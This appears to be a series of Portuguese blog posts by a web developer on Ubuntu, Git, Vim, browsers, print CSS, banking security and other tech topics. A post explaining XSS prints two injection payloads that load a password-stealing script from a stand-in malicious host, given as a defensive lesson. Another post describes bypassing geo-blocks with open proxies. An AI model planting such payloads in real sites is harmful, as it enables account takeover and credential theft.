Meu ambiente de trabalho em 7 itens

O Mike me convidou, então lá vai:

1. Ubuntu

O sistema operacional que simplesmente funciona. Meu notebook tem Ubuntu, o da minha mulher e os dos meus filhos também. Todos tem o Windows OEM em dual-boot. Nem me lembro quando foi a última vez que vi alguém bootar o Windows lá em casa. Aqui na Visie o Ubuntu também parece ser o sistema predileto de todo mundo que não tem um Mac 😉

Sem brincadeira, se você desenvolve para um sistema Unix-like, deveria usar um. Você vai ter o mesmo modelo de permissões, a mesma estrutura de arquivos e as mesmas ferramentas na sua máquina e na hospedagem. Você vai ter shell script. Um dia desses resolvemos um problema em um projeto criando um link simbólico para um arquivo. Essa solução roda em nossos servidores e em nossos desktops.

2. Git

Ainda encontro muitas empresas por aí que não usam controle de versão. Pode parar de rir, estou falando sério. Eu não entendo como alguém pode escrever software sem um bom sistema de controle de versão distribuído.

3. web2py

O framework de desenvolvimento web mais produtivo que eu já achei.

4. Vim

Vim não é fácil, e deve ser mantido fora do alcance de crianças e animais domésticos. Mas é o editor de código mais rápido do planeta. Extremamente poderoso, indispensável para o bom programador.

5. Firefox e Firebug

O desenvolvimento de HTML, CSS e Javascript se divide em duas eras: antes e depois da Firebug.

6. OpenDNS e Dnsmasq

Nós até conseguimos comprar boas conexões aqui no Brasil. Mas os serviços de DNS de todos os provedores que eu conheço são uma piada.

7. Terminator

Com o Terminator posso dividir uma janela em vários terminais, em abas. Para quem usa vim e muito shell, é uma mão na roda.

E eu vou convidar:

Diego Eis, Ederson Peka, Luciano Motta, Mauro Baraldi, Leandro Lima e Pedro Rogério.

Dica de Ubuntu: desktop-webmail

Toda vez que você clica num link de e-mail o Firefox abre o Evolution? Acesse “Editar”, “Preferências”, “Aplicativos” e procure na lista por “mailto:”. Escolha “Gmail” e pronto. Sempre que você clicar num link de e-mails com o Firefox, ele vai abrir o Gmail.

Mas você pode se deparar com links de e-mail fora do Firefox, em outros lugares do sistema operacional. Por exemplo, um ícone mailto: no Desktop. Para fazer o seu Gnome sempre usar o webmail, instale:

apt-get install desktop-webmail

Em seguida acesse, no menu “Sistema” do Gnome, “Preferências”, “Aplicativos preferenciais”. Na primeira aba, abaixo do navegador preferencial, está o programa de e-mails. Deve estar selecionado o Evolution. Escolha o “Desktop Webmail”:

Configurando o Gnome para usar o desktop-webmail

Ao clicar pela primeira vez em um link de e-mail, será exibida a seguinte janela:

desktop-webmail

Você poderá escolher que webmail usar e o link será aberto nele. Se você desmarcar a caixa “Ask again” ele vai abrir diretamente o webmail da próxima vez que você clicar num link de e-mail.

Além disso, você pode abrir a tela de envio de e-mail a partir de um terminal (ou de dentro de um shell script) usando:

xdg-open mailto:email@example.com

Sobre Windows, Linux, paixões e times de futebol

Discussões sobre o melhor sistema operacional, o melhor navegador ou a melhor linguagem de programação tendem a entrar em loop infinito. Cada um dos lados parece achar o outro um completo idiota por não se convencer de suas opiniões.

Semana passada troquei algumas mensagens com o René de Paula que me fizeram pensar bastante sobre o assunto. O René provavelmente não me conhece, mas eu tenho aprendido muito com ele nos últimos anos, principalmente em seu podcast, o Roda e Avisa. E esse post não é um desabafo “estou chateadinho”. Estou citando o nome do René porque a conversa se deu no Twitter, ou seja, em público, e realmente me fez pensar.

O René recomendou esse artigo da ZDNet, analisando um estudo de segurança dos navegadores web. O artigo começa apresentando os resultados do estudo, em que o Internet Explorer ganha de lavada, e segue explicando porque, na opinião do autor, o estudo patrocinado pela Microsoft é tendencioso e irrelevante.

Respondi ao René dizendo que concordava com o artigo que ele havia indicado, que realmente o estudo era tendencioso. E usei a frase “o rei está nu.” Para mim, a crônica da roupa nova do rei é uma excelente metáfora para a situação. Ele me respondeu que havia visto meu blog e que achava que havia um “viés oculto” em tudo o que eu dizia. Em seguida twittou sobre o fato de as pessoas tratarem essas discussões como se fossem sobre times de futebol. Isso me fez pensar um bocado.

Eu gosto de, numa discussão, ouvir o outro lado. Também gosto muito de lógica. Se tem uma coisa que eu vou defender numa discussão, mais do que meu time de futebol, é o bom uso da lógica. Tento nunca ser irrazoável. Sei que todos somos tendenciosos, mas sempre tento ser mais imparcial que a média.

Talvez seja o fato de a discussão ter acontecido no Twitter, meio pouco propício, mas confesso que fiquei muito preocupado com a impressão que o René teve. Quem me conhece, sabe, trabalho com Linux, Windows ou Mac, sem rabo preso, escolhendo sempre o jeito mais simples de resolver cada problema.

Cada cabeça, uma sentença

Em primeiro lugar, não há um sistema operacional “melhor” e outro “pior”. Há um “melhor para você”. O fato de aquele seu amigo usuário de Windows não ter enxergado ainda que o Linux é o melhor sistema operacional do mundo talvez seja porque, para o perfil de uso dele, o Windows seja realmente o melhor sistema operacional.

Dificilmente eu tento convencer alguém a usar exclusivamente Linux. Sempre tento convencer as pessoas a experimentar. Se o sujeito me diz que é um heavy gamer, por exemplo, recomendo o uso de Windows. Sei, o Wine está muito evoluído e tal, mas se ele tem dinheiro para pagar as licenças e pode rodar a versão mais nova de cada jogo no ambiente em que ele foi feito para rodar, por que complicar?

Sim, não me esqueci, para certos perfis de uso, Mac OS X também é um sistema fantástico. Estou quase comprando um para minha mulher.

Existem, porém, padrões absolutos

O fato de não existir uma solução “bala de prata” e a paixão que costuma cercar essas discussões têm levado muita gente, principalmente programadores, a uma posição morna tão irrazoável quanto os extremos. É comum ouvir frases como “a melhor linguagem é aquele com a qual você sabe trabalhar” ou “a melhor ferramenta é a que resolve seu problema.”

Acredito sim que há casos de uso os mais variados. Mas, dentro de determinado caso de uso, há métricas objetivas que você pode usar para dizer o que é melhor. Falando em linguagem de programação, por exemplo, a melhor não é aquela que faz você se “sentir bem”. A não ser que programar para você seja só um hobby, a melhor é aquela que vai te permitir resolver mais rápido o problema do cliente, com a qualidade e a performance necessárias.

Dado um determinado problema do cliente, e uma determinada métrica de performance, deve ser possível apontar a melhor linguagem para essa situação.

Que problema seu software se propõe a resolver?

Se você é desenvolvedor de software, é importante entender isso. Você dificilmente vai encontrar uma oportunidade de desenvolver um produto que é o melhor para todo mundo. Não há unanimidades.

Você pode desenvolver algo que é o melhor para a maioria, pode achar uma minoria endinheirada, ou pode desenvolver algo legal para você mesmo e torcer para que haja gente parecido com você lá fora.

Mas, se você tentar ouvir todas as sugestões que receber e superar os concorrentes em absolutamente todos os perfis de uso, nunca vai terminar de desenvolver.

Mente aberta

Na Visie hoje temos 7 máquinas Windows, 6 Linux e 3 Macs. Sem contar as VMs, o ambiente de testes, e os servidores onde estão hospedadas as aplicações. Desenvolvedor, abra sua mente. Aprenda uma linguagem de programação nova, experimente outro sistema operacional, teste outra solução. Você vai aprender muito.

Aprenda Python, Ruby, Haskell ou Scala. Isso vai tornar você um melhor programador PHP, Java ou .Net. Desenvolva um projeto com uma banco de dados não relacional (estou usando MongoDB em um projeto.) Se você ama WordPress, faça alguma coisa com Joomla, e vice-versa. Tente outro framework, outro editor, outro jeito.

Sobre navegadores

No dia seguinte a essa conversa estive no escritório do W3C Brasil, assistindo ao Café com Browser com o pessoal do Internet Explorer.

Eles passaram boa parte do tempo falando sobre os recursos do navegador para o usuário final. Coisas como abas (oh!) e favoritos mais legais, webclips, processos independentes em cada aba, melhorias de performance e segurança. Tudo muito interessante mas, eu acho, apresentado para o público errado. Estávamos dentro do W3C, afinal de contas. Queríamos saber sobre as melhorias para o desenvolvedor.

Ao final, a palestra sobre melhorias para o desenvolvedor foi, para mim, parte surpreendente, parte decepcionante. Me surpreendi principalmente pela reação dos desenvolvedores no Twitter. Muita gente não conhecia as developer tools do IE8, ou os modos de compatibilidade, por exemplo. Quando foi apresentado o querySelector, muita gente twittou revoltada, porque a Microsoft estava “inventando um novo jeito proprietário de fazer as coisas”. Gente, o querySelector é uma recomendação do W3C (está em Working Draft, mas está lá.)

A parte decepcionante, expressei em minha pergunta:

Em suma, não tenho ódio da Microsoft ou de quem quer que seja. Não quero que o Internet Explorer suma do mapa. Ainda tenho projetos em ASP, VB e .Net, e sou feliz com isso. Só quero poder desenvolver uma vez só minhas aplicações. Quero não ter que cobrar do cliente pelo custo de fazê-la funcionar no Internet Explorer. Quero entregar mais rápido aplicações melhores, mais estáveis, com menos código.

Falha no Password Manager do Firefox?

Veja como essa notícia no Terra explica mal as coisas e espalha o terror:

A versão mais recente do navegador Firefox, a 2.0.0.5, possui uma falha em seu gerenciador de senhas que pode permitir o acesso a elas por sites maliciosos. O problema só se manifesta se o Javascript[bb] e o gerenciador de senhas estiverem acionados – o que é o padrão. Conforme o site Linux.com, a falha pode ser explorada com truques bastante antigos como o cross-site scripting, pequeno programa em um site que manipula objetos na máquina do usuário ou em outro site.

Quem tomar tempo para ler o anúncio da falha vai entender melhor. A falha não é no Password Manager. É uma falha de script-injection e XSS (cross-site scripting). Vou explicar em detalhes: se você tem um site em que os usuários inserem conteúdo, deve tomar cuidado para que eles não insiram javascript no conteúdo. Por exemplo, se os usuários cadastram uma descrição pessoal em seus perfis, e você simplesmente imprime esta descrição, corre sérios riscos. Alguém pode escrever, em sua descrição, algo como:

<script src="http://meusitemalicioso.com/scriptsqueroubamsenhas.js"></script>

Naturalmente, isso é muito perigoso! Não basta bloquear a tag script, você precisa se certificar de que o usuário não insira javascript na página de forma alguma. Por exemplo:

<img src="imagemqualquer.gif"
onload="document.getElementsByTagName('script')[0].src='http://meusitemalicioso.com/scriptsqueroubamsenhas.js'" />

Ou seja, é sua obrigação se certificar de que seus usuários não podem inserir javascript em nenhuma página de seu site. Isso porque o modelo de segurança do javascript está baseado na origem do script. Scripts numa página podem acessar qualquer coisa dentro daquele domínio. Então, se você permite que seus usuários usem a técnica acima, eles podem fazer com que os usuários que acessarem o perfil/post/comentário malicioso:

  1. Tenham suas contas canceladas. Basta que o script crie um iframe oculto, carregue a URL de cancelamento de conta nele, aguarde alguns segundos e clique no botão “Sim, eu tenho certeza”
  2. Tenham suas senhas modificadas. De novo, no frame oculto. Carregando o formulário de mudança de senha, preenchendo e submetendo. Se não houver validação de referer, isso pode ser feito inclusive sem o iframe, usando o objeto XMLHTTPRequest (via Ajax[bb]).
  3. Enviem mensagens para todos os usuários do site, transfira todas as suas comunidades para um determinado perfil, veja o site em cor de rosa com uma foto do Reginaldo Rossi no logo e o que mais o agressor quiser.

Tudo o que eu descrevi acima funciona em qualquer navegador. Não se trata de uma falha no navegador, mas de uma falha no site. Bom, o que o pessoal da heise descobriu é que um agressor pode criar um formulário de login falso, e se você salvou a senha daquele site o Firefox, o Safari e o Konqueror vão preencher o formulário automaticamente. E esse formulário pode ser lido pelo script do agressor. Ora, o sujeito pode virar o site de ponta cabeça, claro que também pode acessar o formulário de login! E isso só não funciona no IE porque ele não tem um password manager 😉

Ou seja, a falha não é do Firefox, mas do site, que permite acesso irrestrito ao atacante. É um site em que você não deveria confiar, que você não deveria acessar, ou pelo menos não deveria acessar com a mesma senha do seu cartão do banco. O fato de um navegador não ter password manager não vai tornar o site mais seguro. A conclusão a que chega o pessoal da heise:

Da perspectiva dos usuários, significa que eles não deveriam confiar suas senhas ao password manager em sites que permitem aos usuários criar suas próprias páginas contendo scripts.

Grande coisa! Você não deveria confiar, de maneira nenhuma, em sites que permitem aos usuários criar suas próprias páginas contendo scripts. Não é só seu password manager que está em risco, e não importa que navegador você está usando.

CSS de impressão no fechaTag

Acabo de criar um CSS de impressão para este blog. Levei uns dez minutos.

O código ficou assim:

form,#sidebar,iframe,#otop,#respond,.navigation,.rec6,.linkk{
display:none;
}
h2{
margin:0;
}
.entry{
line-height: 150%;
}
#header h1{
margin:0;
padding:0;
font-size:24px;
}
#header .description{
padding:0;
}
h2{
padding:40px 0 0;
margin:0;
}

E o resultado:

Em suma: você esconde tudo o que não pode ser usado ou não faz sentido no papel (menus, formulários, etc.) e tenta não atrapalhar o usuário. Aliás, não dá para fazer muito mais do que isso. Os mecanismos de impressão dos navegadores foram feitos para simplificar as páginas e economizar tinta.

Fácil, não?

Microsoft, Google e o poder da massa crítica

Está todo mundo por aí falando sobre:

  • Microsoft Surface, um computador-mesa realmente impressionante. Entre no site e veja alguns dos videozinhos que você vai entender.
  • Google Gears, uma extensão para Firefox/Internet Explorer que permite ao desenvolvedor web guardar dados locais, na máquina do usuário.
  • O Orkut agora permite que você cadastre feeds em seu perfil.

Quando olhei cada um desses lançamentos, tive a mesma reação: “Ah, grande coisa!”

Nenhuma dessas idéias é nova ou revolucionária. Começando pelo Surface, é uma coleção de idéias velhas. Já vimos parte delas implementada no iPhone e na maneira como o sujeito pode usar os dedos nele. A idéia de colocar um computador numa mesa ou permitir seu uso por mais de uma pessoa também não é nova. E a maquininha da Microsoft está saindo por 10 mil. Dólares.

O Google Gears merece um pouquinho de explicação antes de dizer que a idéia não é nova. O Gears tem três componentes importantes. O primeiro é um tipo de servidor proxy com cache local. É um pouquinho mais do que isso, mas no fim permite a uma aplicação web responder dados ao usuário uma única vez, e ele terá esses dados em sua própria máquina a partir daí. O segundo é um banco de dados local, que permite a uma aplicação web, por exemplo, funcionar offline. O terceiro é um mecanismo para fazer com que seus scripts possam ser executados em segundo plano, sem congelar o navegador. De verdade? Isso não é nem tão novo, nem tão revolucionário assim. Para o sujeito que está desenvolvendo um Gmail, pode fazer diferença. Mas para pequenas aplicações, ou mesmo as medianas, dessas que a gente desenvolve todo dia, tudo poderia ser resolvido com cookies e um pouquinho de inteligência, sem demandar a instalação de um plugin.

Por fim, os feeds no Orkut. Aqui a experiência de quem esperava algo realmente novo pode ser decepcionante. Leia os comentários do Charles Pilger sobre o assunto, por exemplo.

Apesar disso, há algo que pode realmente fazer diferença nesse tipo de produto: massa crítica, quantidade de usuários, visibilidade. O Surface pode mostrar ao mundo a idéia nova. Talvez eu nunca venha a ter um Microsoft Surface, mas quem sabe eu daqui a algum tempo comecem a vender o XingLing Surface, o Itautec Surface ou o Positivo Surface? Tenho perguntado ao auditório, nos Encontros Locaweb, quem usa leitores de feeds e quem fornece RSS de qualquer maneira. Num público de desenvolvedores, o número de pessoas que levantam suas mãos é assombrosamente baixo. Imagino que entre os seres humanos comuns este números deve ser ainda menor. Feeds no Orkut podem ser um excelente recurso educativo. Isso pode fazer muita gente descobrir o RSS.

Em relação ao Gears, assim como em relação ao Silverlight, que não está na lista acima porque já tem um tempo, acontece algo curioso. Quem teria coragem de apostar hoje numa tecnologia que exige a instalação de um plugin para que seu site seja usado? Se fosse qualquer empresa pequena que estivesse lançando um desses produtos, ele logo seria descartado como algo ridículo. Mas todo mundo tem suas em relação ao poder de empresas como a Microsoft ou o Google de fazer com que as pessoas instalem algo em suas máquinas.

Em suma, quando você tem metade da Internet usando seus produtos, as regras podem ser diferentes para você. E quando você lança um Google Notebook ou um Zune, as pessoas parecem se esquecer muito rápido que você fracassou.

Em relação ao fato de não haver nenhuma novidade nesses produtos, vale lembrar o que diz o Getting Real: uma boa idéia não vale quase nada, o que vale mesmo é uma boa execução. Embora o Surface não seja novo, parece pelos vídeos que foi executado de maneira exímia.

E, claro, a história dos computadores mostra que nem sempre os melhores vencem. Nada de certezas, por enquanto.

Links interessantes:

Como acessar o Pandora de fora dos Estados Unidos

How to: Access Pandora from outside the US

Vou explicar aqui em português os métodos 1 e 2:

  1. Firefox + anonymous proxy: o truque é simples, você visita um dos seguintes sites:
    http://tools.rosinstrument.com/proxy/
    http://www.publicproxyservers.com/

    http://www.proxz.com/
    http://www.stayinvisible.com/
    E lá você encontra o endereço de um servidor proxy[bb] aberto. Encontrando, basta ir no Firefox em Editar > Preferências > Avançado > Rede > Configurações e configurar lá o servidor proxy escolhido. A tela é mais ou menos assim:

  2. Usando um proxy CGI público: a solução acima tem resultados melhores, mas está é bem mais prática. Não precisa configurar nada, entre neste site, escolha um servidor proxy na lista, digite o endereço do site a visitar (pandora.com) e navegue.

Os métodos são os mesmos que foram usados para acessar o YouTube quando ele foi bloqueado, e são os mesmos que você pode usar para acessar qualquer outra coisa que seja bloqueada em seu país ou em sua rede.

Antes que chovam comentários perguntando: sim, se o administrador de sua faculdade não bloqueou os open proxies, deve servir para você acessar o Orkut bloqueado de lá. Já o MSN bloqueado é mais complicado, mas você pode tentar acessar, via open proxy, o Meebo. De qualquer maneira, você não devia fazer isso. A rede é da faculdade, e eles é que mandam lá. Deve ter uma lan house aí na esquina onde você pode perder seu tempo no Orkut com tranqüilidade.

Imite o Mac OS X você também

Dashboard, Exposè, estilo Aqua, tudo já foi copiado no elegante Mac OS X. Mas a marca registrada do sistema ainda é o Dock. Há uma porção de cópias interessantes para o Dock em diversos ambientes. Mas, com javascript e CSS, eu nunca tinha visto uma razoável. Até que vi essa aqui. Veja esse Dock rodando nesse exemplo.

Muito bom. Tanto o código quanto o resultado visual.

Ah, se você tiver um tempinho para estudar o código, vai passar a odiar um pouquinho mais o Internet Explorer 😉

Songbird ainda não está pronto para mim

Como todo mundo anda elogiando, resolvi testar o Songbird. O programa é lindo! Mas eu acho que ainda não vou conseguir usá-lo. Talvez eu não tenha entendido direito o funcionamento do programa, e algum leitor mais esperto do que eu possa me ajudar.

Eu entendi errado ou o Songbird não entende feeds de Podcast? Só consegui pedir ao programa para assinar o conteúdo de uma página, que carregue no navegador, não um feed XML[bb]. No caso de feeds que possuem uma folha de estilo XSLT para o navegador, como os do Feedburner, a coisa funciona porque o Songbird os entende como uma página web:

Songbird vendo um feed no Feedburner

Já se o arquivo XML não tem nenhuma mágica associada a ele, veja o que acontece:

Songbird vendo um feed XML

Ou seja, eu preciso visitar o site, e mandar o Songbird “assinar” a página que contém a lista de arquivos mp3. Há uma série de problemas com essa abordagem:

  1. Nem todos os feeds tem uma página HTML[bb] que liste os arquivos. Estes eu não posso assinar.
  2. O endereço da página pode mudar. Não deveria, claro, “cool URI don’t change” certo? Mas pode. E muita gente publica conteúdo só no feed, exclusivo para quem assina.
  3. Preciso navegar na minha coleção de podcasts e repetir este processo um a um.
  4. Por falar nisso, não há uma maneira de importar meu OPML. Incluir os podcasts um a um não é divertido. E como ele também não exporta, usar o Songbird significaria repetir o processo no dia em que eu resolvesse migrar para outro programa.

Ou seja, por enquanto ainda não vou me arriscar com o Songbird. É um projeto open source, baseado em XUL, logo é muito fácil criar extensões para ele e melhorá-lo. Qualquer um que saiba javascript pode colaborar. Quem sabe eles não resolvem isso rápido?

Resultado do concurso dos 4KB

Depois de muito confabular, chegamos a uma conclusão a respeito do Desafio dos 4KB.

O vencedor é o Michael Humberto Castillo, com seu joguinho. Demoramos a decidir porque o joguinho tem uns bugs, mas foi o mais impressionante que foi enviado. Como o critério, segundo o anúncio da promoção, era a quantidade de barulho produzida pela reação emocionada do pessoal aqui, não conseguimos deixar de premiar o Humberto, apesar dos pequenos bugs. Parabéns Humberto! Aguarde nosso contato.

Parabéns também a todos os outros participantes! Foi muito divertido.

Firefox, o monstro

Deixei o micro ligado durante a noite. Não estava navegando nem fazendo nada de especial, só ficou ligado. Quando fui tentar usá-lo pela manhã, estava muito, muito lento. Talvez o usuário de Windows ache que estou de frescura, afinal, isso é assim mesmo, basta um reboot e tudo se resolve. Mas deixe-me dizer que no Linux[bb] as coisas são diferentes. Minha máquina no escritório fica meses ligada, sem reboot, sem lentidão. Se está lento, tem alguma coisa errada. Pois veja:

Firefox consumindo 297MB de RAM. Como meu notebook só tem 512MB de RAM, e parte disso é compartilhada com a placa de vídeo, 297MB é muita, muita RAM.

Fechei o Firefox. A janela fechou e o programa levou dois minutos para fechar e liberar a memória. Enquanto isso, consumiu tudo o que pode de CPU:

Quando o programa finalmente morreu, o alívio foi imediato:

Pronto, abri o Firefox de novo, e tudo parece normal:

Alguém tem idéia do que seja isso? Algum plugin ou extensão?

Política de Segurança do Bradesco! Raios Múltiplos!

O Bruno começou: Bradesco: O pior internet banking que eu já vi.

É mesmo, de longe, o pior que eu conheço. Sou cliente Bradesco e Itaú há um bocado de tempo. Mantenho minha conta no Bradesco por uma série de motivos. Primeiro, porque eles me ofereceram crédito pessoal, cartão de crédito, cheque especial e uma porção de outras facilidades, sem que eu precisasse ir até o banco pedir. Sei que eles não fazem isso por bondade, que é interesse do banco que eu me endivide e pague juros a eles. Mas no Itaú, tendo praticamente o mesmo tempo de conta e tendo durante alguns anos movimentado mais dinheiro lá do que no Bradesco, não tenho nem talão de cheques. Eu sei que se for à agência pedir é capaz de conseguir essas facilidades, mas, caramba, tenho que ir à agência?

Há outros motivos para manter minha conta no Bradesco. Embora seja considerado um “banco das massas” e muita gente reclame das filas, tenho tido muita sorte com o atendimento deles na agência. A rede de caixas eletrônicos também é exemplar. Onde eu vou tem um caixa Bradesco Dia e Noite. E, se não tiver, eles ainda têm convênio com a rede 24 horas, embora aí eu pague para sacar. Isso é bem melhor que o sistema do Itaú, onde eu só posso sacar em caixas eletrônicos do próprio Itaú, tenho um limite (pequeno) de saques por mês e, se sacar além do limite, pago uma tarifa por cada saque extra. Além disso, se faço um saque em qualquer caixa eletrônico fora da agência, num supermercado, posto de gasolina ou rodoviária, por exemplo, também pago por aquele saque. Além disso, as tarifas no Itaú são um assalto!

Me sinto entre a cruz e a espada com os dois bancos.

Um ponto para o Bradesco: Uma vez perdi meu cartão do Itaú. Tive que ir até a agência para assinar uma solicitação de um novo. O gerente me deu um prazo, mas a única maneira de saber se o cartão já havia chegado era telefonar para o gerente ou ir até a agência. Acontece que ninguém consegue telefonar para o gerente. Quando o cartão finalmente chegou, o gerente me entregou o cartão e me disse que eu tinha que cadastrar uma senha para liberar o cartão para uso. E para isso, tinha que pegar a fila do caixa. Era o quinto dia útil do mês, a fila era uma daquelas que quase não cabe na agência. No Bradesco, quando meu cartão quebrou, fiz o pedido de um novo por telefone e o recebi em casa.

Um ponto para o Itaú: há pouco tempo eu me mudei e resolvi transferir as contas para uma agência perto de casa. No Itaú a moça digitou meia dúzia de coisas no computador, me deu um único documento para assinar e colou um adesivo em meu cartão com o número da nova conta. Pronto, a conta estava transferida e eu já podia movimentá-la. No Bradesco me pediram uma carta, de próprio punho, solicitando a mudança, me deram um documento de encerramento da conta antiga para assinar, mais toda a papelada de abertura de uma conta nova. Maços e maços de papéis para assinar. Aliás, o Bradesco parece que adora gastar papel. Está bem que eles trabalham com papel reciclado, mas acho que eles fariam mais bem à Natureza se simplesmente poupassem a metade do papel que gastam.

No fim, não sei que banco escolher. Não se também se abro uma conta em um outro e encerro as duas que tenho.

Agora, falando em políticas de segurança, o Bradesco realmente é o campeão da chateação. Uma vez minha esposa telefonou para o Fone Fácil, que devia se chamar Fone Difícil. Ela não estava acostumada às confirmações de cadastro. Aqui em casa, quando a gente precisa telefonar para a companhia telefônica, o banco ou qualquer outro fornecedor de serviços, geralmente sou eu que faço. Você nunca foi pego de surpresa quando perguntam sua idade? Principalmente perto do seu aniversário? Foi o suficiente para bloquearem a conta dela e ela ter que ir até a agência para resolver o problema.

Esse tal “Cartão Chave de Segurança Bradesco” é a coisa mais famigerada que já inventaram. O Itaú tem um igualzinho, mas o Bradesco me pede o cartão para acessar também o Fone Fácil, que devia se chamar Fone Difícil, e para fazer saques no caixa eletrônico.

Preste atenção nos passos para saber meu saldo no Internet Banking:

  1. Acesso o site do Bradesco.
  2. Digito agência e conta e Enter.
  3. Espero, dependendo da conexão muito, até carregar um applet Java.
  4. Digito minha senha eletrônica (não é a mesma do cartão para saque) usando o teclado virtual.
  5. Digito minha frase secreta (pelo menos 22 letras) e Enter
  6. Aparece uma tela me pedindo um dos números do meu cartão chave. Tiro o cartãozinho odioso da carteira, encontro e digito o número pedido e Enter.
  7. Pronto, aparece meu saldo. Viu como é fácil?

Um cliente Bradesco tem:

  1. Uma senha do cartão de débito
  2. Duas letras secretas para usar o caixa eletrônico
  3. Uma senha eletrônica para Internet e Fone Fácil
  4. Um cartão de segurança com 70 números

E de vez em quando ainda te pedem para confirmar dados pessoais em algumas operações.

Por fim: estava tentando testar um serviço novo, o NovoFax, mas não consegui porque o sistema da Visa me manda para o Bradesco quando tento fazer uma compra, e, embora o site e o Internet Banking funcionem no Firefox, os sistemas de pagamento eletrônico não. Estou pensando aqui se assino via boleto ou simplesmente desisto.

Snap?

Acabo de bloquear na Adblock a seguinte url:

http://spa.snap.com/snap_preview_anywhere.js?*

Caramba, mas que negocinho chato esse, né? Fica pulando na sua frente quando você passa o mouse sobre o texto. Não consigo ler com isso aí não.